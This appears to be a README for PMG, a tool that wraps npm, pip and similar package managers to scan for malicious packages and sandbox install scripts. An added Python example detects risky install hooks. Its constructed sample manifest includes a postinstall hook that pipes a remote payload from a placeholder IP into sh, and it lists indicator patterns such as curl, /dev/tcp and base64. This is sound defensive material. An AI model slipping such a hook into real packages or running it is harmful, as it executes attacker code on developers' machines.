Modern software development relies heavily on open-source packages. However, standard package managers (npm, pip, etc.) prioritize convenience over security, executing arbitrary code (like postinstall scripts) on your machine without validation. This vector is frequently exploited by attackers to steal credentials or inject backdoors.
PMG acts as a security middleware layer. It wraps your package manager to:
- Analyze packages for malware before they are installed.
- Sandbox the installation process to prevent system modification.
- Audit every package installation event.
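The install-hook risk described above, that a package manager runs lifecycle scripts such as `postinstall` as arbitrary code before anyone has looked at them, can be made concrete with a small added example. This is illustrative code written for this page, not part of PMG or the SafeDep codebase: it parses an npm `package.json`, lists the scripts npm runs at install time, and flags commands that carry download-and-execute indicators. The indicator list, the two sample manifests and the block/review verdicts are constructed here for illustration.

```python
import json

# npm lifecycle hooks that run automatically during installation. `prepare` is
# run for local and git-sourced installs rather than for published tarballs.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Substrings that commonly appear in install hooks which fetch or execute
# remote content (constructed heuristic list). A hit means "block"; an install
# hook with no hit still means "review", because any install hook is code
# that runs on the developer's machine.
SUSPICIOUS_PATTERNS = (
    "curl ", "wget ", "| sh", "| bash", "base64", "eval(",
    "child_process", "/dev/tcp/", "powershell",
)


def find_install_hooks(manifest_text: str) -> dict:
    """Return {hook_name: command} for the install-time scripts in a package.json."""
    manifest = json.loads(manifest_text)
    scripts = manifest.get("scripts") or {}
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}


def suspicious_indicators(command: str) -> list:
    """List the SUSPICIOUS_PATTERNS found in one hook command, in pattern order."""
    lowered = command.lower()
    return [p for p in SUSPICIOUS_PATTERNS if p in lowered]


def review_manifest(manifest_text: str) -> list:
    """Produce one finding per install hook, each with a block/review verdict."""
    findings = []
    for name, cmd in find_install_hooks(manifest_text).items():
        hits = suspicious_indicators(cmd)
        findings.append({
            "hook": name,
            "command": cmd,
            "indicators": hits,
            "verdict": "block" if hits else "review",
        })
    return findings


# Constructed sample manifests (not real packages) used as input below.
SAMPLE_MALICIOUS = json.dumps({
    "name": "example-lib",
    "version": "1.0.0",
    "scripts": {
        "test": "node test.js",
        "postinstall": "curl -s http://203.0.113.7/payload | sh",
    },
})

SAMPLE_CLEAN = json.dumps({
    "name": "tidy-lib",
    "version": "2.3.1",
    "scripts": {"test": "node test.js", "build": "tsc"},
})


if __name__ == "__main__":
    for label, text in (("malicious", SAMPLE_MALICIOUS), ("clean", SAMPLE_CLEAN)):
        print(label, review_manifest(text) or "no install hooks")
```

A check like this only looks at the manifest; a hook that reads `node setup.js` gets a "review" verdict and still has to be inspected or run under containment, which is the gap PMG's sandboxing is meant to close. npm's own `--ignore-scripts` flag skips these hooks entirely at the cost of breaking packages that legitimately build native code in `install`. The example is npm-specific: pip has no equivalent `scripts` key, since a `setup.py` is itself the code that runs.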
Get protected in seconds.
MacOS / Linux (Homebrew)

```sh
brew install safedep/tap/pmg
```

NPM

```sh
npm install -g @safedep/pmg
```

See Installation for additional methods.
Configure your shell to use PMG automatically.
```sh
pmg setup install
# Restart your terminal to apply changes
```

Continue using your favorite package manager tools as usual. PMG works silently in the background.
```sh
npm install express
# or
pip install requests
```

If a malicious package is detected, PMG blocks it immediately:

```
[PMG] Blocked malicious package: malicious-lib@1.0.0
[PMG] Reason: Known malware signature detected
```
| Feature | Description |
|---|---|
| Malicious Package Protection | Real-time protection against malicious packages using SafeDep. |
| Sandboxing | Enforces least privilege using OS native sandboxing to contain installation scripts. |
| Dependency Analysis | Deep scans of direct and transitive dependencies before they hit your disk. |
| Event Logging | Keeps a verifiable audit trail of all installed packages. |
| Zero Config | Works out of the box with sensible security defaults. |
| Cross-Shell | Seamlessly integrates with Zsh, Bash, Fish, and more. |
PMG supports the tools you already use:
| Ecosystem | Tools | Status | Command Example |
|---|---|---|---|
| Node.js | npm | Yes | npm install <pkg> |
| Node.js | pnpm | Yes | pnpm add <pkg> |
| Node.js | yarn | Yes | yarn add <pkg> |
| Node.js | bun | Yes | bun add <pkg> |
| Node.js | npx | Yes | npx <pkg> |
| Node.js | pnpx | Yes | pnpx <pkg> |
| Python | pip | Yes | pip install <pkg> |
| Python | poetry | Yes | poetry add <pkg> |
| Python | uv | Yes | uv add <pkg> |
Homebrew (MacOS/Linux)

```sh
brew tap safedep/tap
brew install safedep/tap/pmg
```

NPM (Cross-Platform)

```sh
npm install -g @safedep/pmg
```

Go (Build from Source)

```sh
# Ensure $(go env GOPATH)/bin is in your $PATH
go install github.com/safedep/pmg@latest
```

Binary Download

Download the latest binary for your platform from the Releases Page.
Security is our first-class requirement. PMG builds are reproducible and signed.
- Attestations: GitHub and npm attestations are used to guarantee artifact integrity.
- Verification: Users can cryptographically prove the binary matches the source code.
- See Trusting PMG for verification steps.
PMG runs transparently, but you can control it when needed.
Treat all unverified or suspicious packages as malicious.

```sh
pmg --paranoid npm install <package>
```

Simulate installation to check for malware without writing to disk.

```sh
pmg --dry-run npm install <package>
```

Enable verbose logs for troubleshooting.

```sh
pmg --debug npm install <package>
```
⚠️ Warning: Bypassing security checks exposes users to risk.
```sh
export PMG_INSECURE_INSTALLATION=true
npm install <package>
```

Contributions are welcome! Please see CONTRIBUTING.md for guidelines on how to build and test PMG locally.
PMG collects anonymous usage data to improve project stability and reliability.
To disable: `export PMG_DISABLE_TELEMETRY=true`.

